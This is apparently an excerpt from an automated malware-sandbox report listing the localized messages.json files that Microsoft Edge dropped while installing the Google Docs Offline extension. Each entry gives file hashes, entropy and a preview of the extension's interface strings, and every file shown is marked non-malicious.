                                                                                                                                                                                                                                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):968
                                                                                                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):838
                                                                                                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):911
                                                                                                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):972
                                                                                                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):990
                                                                                                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):935
                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
